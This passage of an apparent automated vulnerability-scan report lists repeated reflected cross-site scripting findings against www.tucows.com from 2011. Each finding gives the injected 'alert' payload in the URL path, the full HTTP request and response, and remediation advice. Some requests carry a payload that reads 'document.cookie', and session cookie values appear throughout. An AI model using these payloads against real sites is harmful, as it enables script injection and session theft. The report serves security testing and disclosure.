User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da601"-alert(1)-"3c77224e1a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesda601"-alert(1)-"3c77224e1a9/js/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e58a"-alert(1)-"92953272be5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js7e58a"-alert(1)-"92953272be5/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee858"-alert(1)-"2b00b808463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/signupin.jsee858"-alert(1)-"2b00b808463 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65747"-alert(1)-"fdf529e6e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d3d"-alert(1)-"9fd657fe3af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b794b"-alert(1)-"c38b7601809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/x_core.jsb794b"-alert(1)-"c38b7601809 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80391"-alert(1)-"2da181f97ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e49a"-alert(1)-"bcc9c43802 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d536b"-alert(1)-"a064303b2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beba4"-alert(1)-"b69b27dceac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ff"-alert(1)-"ccf5c4f6b2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd99a"-alert(1)-"3c47dc9c7d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
